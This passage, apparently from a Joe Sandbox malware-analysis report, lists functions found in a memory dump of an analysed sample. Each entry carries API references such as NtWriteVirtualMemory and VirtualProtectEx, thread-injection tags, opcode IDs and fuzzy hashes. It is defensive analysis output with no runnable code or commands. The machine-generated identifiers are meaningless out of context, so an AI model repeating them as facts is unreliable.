                          • Instruction Fuzzy Hash: 49016130618B088FDB44DB5C9488669B7F5FBAC351F11446DE98AC3261DAB4C9858B42
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 008126BC Relevance: 3.1, APIs: 2, Instructions: 59threadinjectionCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 0000001E.00000002.1078876889.00000000007F1000.00000020.80000000.00040000.00000000.sdmp, Offset: 007F1000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_30_2_7f1000_control.jbxd
                          Similarity
                          • API ID: CreateQueueThreadUser
                          • String ID:
                          • API String ID: 3600083758-0
                          • Opcode ID: 1042369a62fa130813053ba96abf502003b5e90ec07148417e067b6cd7aabf44
                          • Instruction ID: 40bbb1b38753bb37160389f21a299aeaa568acd8f30652799daebe9c7490be60
                          • Opcode Fuzzy Hash: 1042369a62fa130813053ba96abf502003b5e90ec07148417e067b6cd7aabf44
                          • Instruction Fuzzy Hash: FA014030754A094FEB54EFADA85D629B7E2EB98311B04456AA409C3264DF78DC41C791
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00814EB8 Relevance: 1.7, APIs: 1, Instructions: 216memoryCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 0000001E.00000002.1078876889.00000000007F1000.00000020.80000000.00040000.00000000.sdmp, Offset: 007F1000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_30_2_7f1000_control.jbxd
                          Similarity
                          • API ID: ProtectVirtual
                          • String ID:
                          • API String ID: 544645111-0
                          • Opcode ID: abe52cca80897bf381d4248daf34a54796b032552c6d90c33958d84888dac85f
                          • Instruction ID: c83cd96a985393256638ee338a357489f136958dcbf60453ec3f51e13c76855a
                          • Opcode Fuzzy Hash: abe52cca80897bf381d4248daf34a54796b032552c6d90c33958d84888dac85f
                          • Instruction Fuzzy Hash: 44616570618E09DFD754EF18D489AA6B3E4FFA8311F50552EE84AC3261DB34E881CBC2
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0080B4B0 Relevance: 1.7, APIs: 1, Instructions: 162COMMON
                          Download Yara Rule
                          APIs
                          • RtlDeleteBoundaryDescriptor.NTDLL ref: 0080B5F6
                          Memory Dump Source
                          • Source File: 0000001E.00000002.1078876889.00000000007F1000.00000020.80000000.00040000.00000000.sdmp, Offset: 007F1000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_30_2_7f1000_control.jbxd
                          Similarity
                          • API ID: BoundaryDeleteDescriptor
                          • String ID:
                          • API String ID: 3203483114-0
                          • Opcode ID: db30e70d32ecff436d382c0cc0cbe0bcce1e7c4dde14a7d37afc866764c18652
                          • Instruction ID: a35d8d9b01656b036d3f1fc6098d7280ff31cf49c4bc23fbd0e5ae01581b72f4
                          • Opcode Fuzzy Hash: db30e70d32ecff436d382c0cc0cbe0bcce1e7c4dde14a7d37afc866764c18652
                          • Instruction Fuzzy Hash: 0941F530658E1C8FDB98EF6CEC859A673E1F769310B50416DE00AC72A1DB78EC85CB81
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0080F31C Relevance: 1.6, APIs: 1, Instructions: 105COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 0000001E.00000002.1078876889.00000000007F1000.00000020.80000000.00040000.00000000.sdmp, Offset: 007F1000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_30_2_7f1000_control.jbxd
                          Similarity
                          • API ID: Sleep
                          • String ID:
                          • API String ID: 3472027048-0
                          • Opcode ID: eca3608900a0a775f67c8676a6116e6d08b3199a6ef1a3ec5734ddc5bbab5a3c
                          • Instruction ID: edecbc483e4e3e5a4e78296c4588801ede3f1bf86801957fe336874b1639ac28
                          • Opcode Fuzzy Hash: eca3608900a0a775f67c8676a6116e6d08b3199a6ef1a3ec5734ddc5bbab5a3c
                          • Instruction Fuzzy Hash: 183164303146488BEB98EF7CECD55AB73E6FB98300744D529A547C3692DF38D9468B42
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 007F495C Relevance: 1.6, APIs: 1, Instructions: 74COMMON
                          Download Yara Rule
                          APIs
                          • FindCloseChangeNotification.KERNELBASE ref: 007F4A08
                          Memory Dump Source
                          • Source File: 0000001E.00000002.1078876889.00000000007F1000.00000020.80000000.00040000.00000000.sdmp, Offset: 007F1000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_30_2_7f1000_control.jbxd
                          Similarity
                          • API ID: ChangeCloseFindNotification
                          • String ID:
                          • API String ID: 2591292051-0
                          • Opcode ID: 8db922fd9091025d917ee3fa5b9b8cb8437445c7be8339cafab69875c143e589
                          • Instruction ID: 4c85629f6293a23fb6d7d749038ca6bd6557bda43f6bb948f126895e42dec54e
                          • Opcode Fuzzy Hash: 8db922fd9091025d917ee3fa5b9b8cb8437445c7be8339cafab69875c143e589
                          • Instruction Fuzzy Hash: 19215931208B498FEB95EF2CD888A6B77E4FBA8301B11452DE60AC3260DB78D9448B41
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00817340 Relevance: 1.6, APIs: 1, Instructions: 74memoryCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 0000001E.00000002.1078876889.00000000007F1000.00000020.80000000.00040000.00000000.sdmp, Offset: 007F1000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_30_2_7f1000_control.jbxd
                          Similarity
                          • API ID: ProtectVirtual
                          • String ID:
                          • API String ID: 544645111-0
                          • Opcode ID: 61193fbb3c11a6377def257641601a12032aaed3a0883b3445c2989be8d24a87
                          • Instruction ID: 50341c8bf210fc889815468630cec5d8aa995982d37dfc57338738e9f804974b
                          • Opcode Fuzzy Hash: 61193fbb3c11a6377def257641601a12032aaed3a0883b3445c2989be8d24a87
                          • Instruction Fuzzy Hash: 9111513160CB098FAB14EF59E445469B7E9FB9C311B40463EEC8AC3345EE70E9458B86
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 007F4A48 Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 007F6D24: NtWriteVirtualMemory.NTDLL ref: 007F6D43
                          • VirtualProtectEx.KERNELBASE ref: 007F4A9C
                          Memory Dump Source
                          • Source File: 0000001E.00000002.1078876889.00000000007F1000.00000020.80000000.00040000.00000000.sdmp, Offset: 007F1000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_30_2_7f1000_control.jbxd
                          Similarity
                          • API ID: Virtual$MemoryProtectWrite
                          • String ID:
                          • API String ID: 1789425917-0
                          • Opcode ID: dc2d7a55bae03b42cae034855de4c2d582e22b98317ece67652a204506ff4dc2
                          • Instruction ID: 288c02b5ee3f0880fefcb5c3905c0fafb287193d5882b8f1308602e54be4dcd9
                          • Opcode Fuzzy Hash: dc2d7a55bae03b42cae034855de4c2d582e22b98317ece67652a204506ff4dc2
                          • Instruction Fuzzy Hash: EC015A70A18B088FCB48EF58E0C9525B7E0EB98311B4045AEE90DC7256CB70D945CB86
                          Uniqueness

                          Uniqueness Score: -1.00%